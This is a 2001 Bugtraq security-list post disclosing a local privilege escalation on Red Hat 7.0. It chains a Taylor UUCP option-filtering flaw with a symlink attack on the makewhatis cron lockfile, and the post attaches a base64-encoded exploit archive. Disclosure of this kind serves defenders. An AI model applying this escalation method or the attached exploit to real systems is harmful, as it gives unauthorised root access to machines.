Date: Sat, 1 Dec 2001 01:56:52 +1300 (NZDT)
From: zen-parse <zen-parse@gmx.net>
To: bugtraq@securityfocus.com
Subject: Redhat 7.0 local root (via uucp) (attempt 2)
---1463783680-1077295494-1006678534=:26122
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.33.0112010119442.1058@clarity.local>
Affects: RedHat 7.0 (possibly others)
28 Aug 2001 01:27:24 +1200 uucp vulnerability exposed to vendor
9 Nov 2001 07:14:15 +1300 this makewhatis vulnerability exposed to vendor
/usr/sbin/makewhatis
An earlier version(1) of makewhatis had a fault in the handling of
compressed files that allowed execution of arbitrary commands as root.
A patch for this problem was developed that seemed to be effective.
However, the patch was not restrictive enough in the metacharacters it
filtered out.
It is still possible to perform file creation or overwriting with
arbitrary contents, as root.
Taylor UUCP package and uucp exploit.
The uucp utilities fail to filter out long options, which lets users
specify alternate configurations and as a result, execute commands with
uid and gid uucp. (2)
Attached is an exploit for uucp (developed for RedHat 7.0, but other
vulnerable distributions should be similar).
The root exploit.
drwxrwxr-x 4 root uucp 4096 Nov 30 19:48 /var/lock/
On RH7.0 uucp allows arbitrary filename creation through the lockfile
creation performed by /etc/cron.{daily,weekly}/makewhatis.cron.
--- Start /etc/cron.daily/makewhatis.cron ---
#!/bin/bash
LOCKFILE=/var/lock/makewhatis.lock
# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "rm -f $LOCKFILE" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
--- End /etc/cron.daily/makewhatis.cron ---
Simply symlinking /var/lock/makewhatis.lock to the filename u want to
create will cause it to be created.
This root exploit is only for RedHat 7.0, but a similar method may work on
other distributions.
-- zen-parse
(1) http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=42450
Previous makewhatis problem.
(2) http://www.securityfocus.com/bid/3312
Taylor UUCP vulnerability.
(3) http://mp3.com/cosv
Some starving musicians.
This is my 2nd attempt to post this: if it was rejected for any reason
last time, would be nice to know why. If the previous one had just
disappeared, that would be strange.
--
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
---1463783680-1077295494-1006678534=:26122
Content-Type: APPLICATION/X-GZIP; NAME="redhat7.0-uucp-to-root.tar.gz"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0111252155340.26122@clarity.local>
Content-Description: redhat root via uucp exploit
Content-Disposition: ATTACHMENT; FILENAME="redhat7.0-uucp-to-root.tar.gz"
H4sIAFWtADwAA+1Y+2/bNhDOz/wrrmlRJ1308jNw0wLF1iAFiraoEzTbXKCy
RFtaJFIgKcdO2/99pB6WLdtJBhgGhvJzIkX3II+8T3d0GPYDV/RM20hTLzEE
NRilwjrYJWy7bfd6PXm35d1euRc4sHtt23aa3XZH2jmdTqt7AJ2dRrEFKRcu
Azi4w8RIXMbxFruH9P9TsM35x7PEwCw2ebCDOWxH5rvT2Zb/VrfZWuS/2WpK
+15b5d/ewdwP4hfP/9Mn1igkFg8Q9gIKFAZYiJBMIE2Ai3Q8Rn+DMQMr5Swz
TFPixhi+wo8fcASZzww+MTpyR9EcCAVFIwiJ3NUowr4JLwHPQgEOHKPLi3eD
i4+Dy1ffilGM6Bvi2Adu/VnAelYaWRN4bU1dZok4sVhKRBByODv78vb83bWy
QZ4rliymU3Mq1W8/nqMkHfkhAwsR6uNsnmk5PComrgQRnYzDCMNioKsrKUIy
fLEqLyXIx6O05pOmmRCl5IbQWwIejWOX+BzevH9fPkjyiGDh0s8vxa721QXx
Oa9NmQuQH7rRqqaUoISyWpylBKmtyDdpXVnulHwEH4/dNBJIzBMMSZhgVERc
uU2wUGldGnItkmJETxYTI2F0wty48h//gzHb5F0uOXeO52vJ8dzI4FjFUjww
7OFwKteLRChtXTJX+yZwDAuvJKAEQ7vXa3VPOxUbNod2z9LGlCZmRuc8vCvA
0zDKLuj3nOfGFzAMj5JxOHm1SsWVUZr5MGWETzIlTyiNLKWo2H9typ/y6brl
tFrbAmtuj+wxa8NxIuaF9yaiFK6FRVUksjuLwRhXti73DR7gKIJcrfZlSc2D
e0yDmPrwG99ooWZetpqtr6xOp8D0Si65ITk6Rt8RcCwYnoT+kXTK7scnhnP8
slCkhSJdUuAZ9qKjw2LNhyeH6mJLzc9irzww6OYFqghkkZlB47H8yDNRZ4Q5
kOUmrepi478NWlH3kVSTTOs1qhZABIgAV3WsD4MI40T1habcNzm5z03ElQya
pdvnlBBloTyzFJrIq4oIkqzJ8qNiewGLSrQoIGUtyFaS70pZ9st0561onSpf
4fnzTXLZo7LYGjM4d8OsHQ0oY3Ozcf9QmROLa01h4wwbhKjqUVvoW6wLKaKt
S/fa/7ec/7IH9dcuToAPnP/srtNbPf815Z/6/LcXVKV9qarLVntjxe4NvpXc
CLmpnlFEwOD5QZAHLsPSgKhfx5oNYfhs+P3Tm8uLYd8e9p3hT8nnuuhWsmn4
Wn5qcjlhXZTVq7rQY5TUZYqhwzMZhOmYk7t7gp/chbJwemMwZLtQL5uKRrYK
UAX9BZSf2mmlaIoL4Vo73NDqsjdZDp6XgqrBrcrzs1JZF6pZ957/Le+/rEXx
zpj+0PvvdJzq+78jvws63Y5U6/d/D6i4/BQGYZzIBnzrzkFQ1XRBcQEogc8X
kiEncM5C+ECn0GyBc9pv2f32KXz4649LUAUbmUv/NYAzMFeayP6ZraGhoaGh
oaGhoaGhoaGhoaGhoaHxa+NfyDBC6wAoAAA=
---1463783680-1077295494-1006678534=:26122--
